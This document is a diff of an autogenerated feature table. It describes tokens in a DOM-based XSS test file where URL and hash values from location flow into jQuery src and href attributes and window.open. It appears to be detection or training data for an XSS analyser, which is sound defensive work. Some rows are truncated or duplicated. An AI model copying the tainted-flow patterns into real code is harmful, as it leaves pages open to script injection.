autogenerated/Xss/DomBasedXss/tst.js:475:25:475:27 | url | CalleeFlexibleAccessPath | $().attr | | autogenerated/Xss/DomBasedXss/tst.js:475:25:475:27 | url | InputAccessPathFromCallee | 0.href | | autogenerated/Xss/DomBasedXss/tst.js:475:25:475:27 | url | InputArgumentIndex | 0 | @@ -17859,6 +123743,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:475:25:475:27 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:475:25:475:27 | url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:475:25:475:27 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:24 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:24 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:24 | exceptional return of $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:33 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:41 | $(" href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:3:476:41 | exceptional return of $("" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:476:5:476:11 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:476:5:476:11 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17873,6 +123787,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:476:14:476:23 | {src: url} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:476:14:476:23 | {src: url} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:476:14:476:23 | {src: url} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:17 | src | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:17 | src | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:17 | src | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:17 | src | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:17 | src | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:476:15:476:22 | src: url | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:476:20:476:22 | url | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:476:20:476:22 | url | InputAccessPathFromCallee | 1.src | | autogenerated/Xss/DomBasedXss/tst.js:476:20:476:22 | url | InputArgumentIndex | 1 | @@ -17882,6 +123811,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:476:20:476:22 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:476:20:476:22 | url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:476:20:476:22 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:476:26:476:33 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:476:26:476:33 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:476:26:476:33 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:476:26:476:33 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:476:26:476:33 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:476:35:476:40 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:476:35:476:40 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:476:35:476:40 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17889,6 +123823,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:476:35:476:40 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:476:35:476:40 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:476:35:476:40 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | $("" ... .href}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | $("" ... .href}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | $("" ... .href}) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | $("" ... .href}) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | $("" ... .href}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | exceptional return of $("" ... .href}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | exceptional return of $("" ... .href}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | exceptional return of $("" ... .href}) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | exceptional return of $("" ... .href}) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:37 | exceptional return of $("" ... .href}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:46 | $("" ... ppendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:46 | $("" ... ppendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:46 | $("" ... ppendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:46 | $("" ... ppendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:46 | $("" ... ppendTo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | $("" ... "body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | $("" ... "body") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | $("" ... "body") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | $("" ... "body") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | $("" ... "body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | exceptional return of $("" ... "body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | exceptional return of $("" ... "body") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | exceptional return of $("" ... "body") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | exceptional return of $("" ... "body") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:3:477:54 | exceptional return of $("" ... "body") | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:477:5:477:9 | "" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:477:5:477:9 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:477:5:477:9 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17903,6 +123867,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:477:12:477:36 | {href: ... n.href} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:477:12:477:36 | {href: ... n.href} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:477:12:477:36 | {href: ... n.href} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:16 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:16 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:16 | href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:16 | href | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:16 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:13:477:35 | href: w ... on.href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:477:19:477:21 | win | contextFunctionInterfaces | 